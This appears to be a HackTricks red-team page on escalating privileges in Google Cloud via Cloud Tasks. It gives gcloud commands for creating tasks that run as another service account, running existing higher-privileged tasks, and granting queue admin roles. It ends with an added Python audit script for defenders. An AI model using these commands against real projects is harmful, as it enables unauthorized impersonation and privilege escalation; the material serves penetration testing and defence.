GCP - Cloud Tasks Privesc

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cloud Tasks

cloudtasks.tasks.create, iam.serviceAccounts.actAs

An attacker with these permissions can impersonate other service accounts by creating tasks that execute with the specified service account's identity. This allows sending authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions services.

```bash
gcloud tasks create-http-task \
  task-$(date '+%Y%m%d%H%M%S') \
  --location us-central1 \
  --queue <queue_name> \
  --url 'https://<service_name>.us-central1.run.app' \
  --method POST \
  --header 'X-Hello: world' \
  --body-content '{"hello":"world"}' \
  --oidc-service-account-email <account>@<project_id>.iam.gserviceaccount.com
```

cloudtasks.tasks.run, cloudtasks.tasks.list

An attacker with these permissions can run existing scheduled tasks without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts.

```bash
gcloud tasks run projects/<project_id>/locations/us-central1/queues/<queue_name>/tasks/<task_id>
```

The principal executing this command doesn't need iam.serviceAccounts.actAs permission on the task's service account. However, this only allows running existing tasks - it doesn't grant the ability to create or modify tasks.

cloudtasks.queues.setIamPolicy

An attacker with this permission can grant themselves or other principals Cloud Tasks roles on specific queues, potentially escalating to roles/cloudtasks.admin which includes the ability to create and run tasks.

```bash
gcloud tasks queues add-iam-policy-binding \
  <queue_name> \
  --location us-central1 \
  --member serviceAccount:<account>@<project_id>.iam.gserviceaccount.com \
  --role roles/cloudtasks.admin
```

This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.
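The three paths above all hinge on who holds cloudtasks.tasks.create, cloudtasks.tasks.run or cloudtasks.queues.setIamPolicy on a queue, and on which service account existing tasks run as. The following audit script is an added example (not part of the original page or of any Google tooling): it takes a queue IAM policy and a task list shaped like the JSON output of `gcloud tasks queues get-iam-policy --format json` and `gcloud tasks list --format json`, and reports the members and task identities a defender should review. The role-to-permission map and the sample inputs are constructed for the demo; only roles/cloudtasks.admin is named on the page, and in practice the map should be filled from `gcloud iam roles describe`.

```python
import json

# Permissions the page identifies as escalation-relevant, with the path each enables.
SENSITIVE = {
    "cloudtasks.tasks.create": "create tasks that run as a chosen service account",
    "cloudtasks.tasks.run": "force-run existing tasks without actAs on their identity",
    "cloudtasks.queues.setIamPolicy": "grant Cloud Tasks roles on the queue",
}

# Constructed role -> permissions map (assumption for the demo; fill from `gcloud iam
# roles describe`). Custom roles not present here are reported as unknown, not skipped.
ROLE_PERMS = {
    "roles/cloudtasks.admin": set(SENSITIVE) | {"cloudtasks.tasks.list"},
    "roles/cloudtasks.enqueuer": {"cloudtasks.tasks.create"},
    "roles/cloudtasks.viewer": {"cloudtasks.tasks.list", "cloudtasks.queues.get"},
}

def audit_queue_policy(policy: dict, role_perms: dict = ROLE_PERMS) -> dict:
    """Map each member of a queue IAM policy to the sensitive permissions it holds.
    Members bound to a role missing from role_perms get the marker 'UNKNOWN_ROLE:<role>'."""
    findings = {}
    for binding in policy.get("bindings", []):
        role = binding["role"]
        if role not in role_perms:
            hits = [f"UNKNOWN_ROLE:{role}"]
        else:
            hits = sorted(p for p in role_perms[role] if p in SENSITIVE)
        if not hits:
            continue
        for member in binding.get("members", []):
            findings.setdefault(member, set()).update(hits)
    return {m: sorted(p) for m, p in findings.items()}

def tasks_with_oidc_identity(tasks: list) -> dict:
    """Return task name -> service account whose OIDC identity the HTTP task will carry."""
    out = {}
    for t in tasks:
        sa = t.get("httpRequest", {}).get("oidcToken", {}).get("serviceAccountEmail")
        if sa:
            out[t["name"]] = sa
    return out

# Constructed sample inputs (not real project data).
SAMPLE_POLICY = {"bindings": [
    {"role": "roles/cloudtasks.admin", "members": ["serviceAccount:ci@proj.iam.gserviceaccount.com"]},
    {"role": "roles/cloudtasks.enqueuer", "members": ["user:dev@example.com"]},
    {"role": "roles/cloudtasks.viewer", "members": ["user:ro@example.com"]},
    {"role": "projects/proj/roles/customTasks", "members": ["group:ops@example.com"]}]}
SAMPLE_TASKS = [
    {"name": "projects/proj/locations/us-central1/queues/q/tasks/t1",
     "httpRequest": {"url": "https://svc.us-central1.run.app", "httpMethod": "POST",
                     "oidcToken": {"serviceAccountEmail": "admin-sa@proj.iam.gserviceaccount.com"}}},
    {"name": "projects/proj/locations/us-central1/queues/q/tasks/t2",
     "httpRequest": {"url": "https://public.example.com/hook", "httpMethod": "GET"}}]

if __name__ == "__main__":
    print(json.dumps(audit_queue_policy(SAMPLE_POLICY), indent=2))
    print(json.dumps(tasks_with_oidc_identity(SAMPLE_TASKS), indent=2))
```

Each member flagged with cloudtasks.tasks.create should be cross-checked for iam.serviceAccounts.actAs on the service accounts that tasks in the queue run as, since that combination is the first path above.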
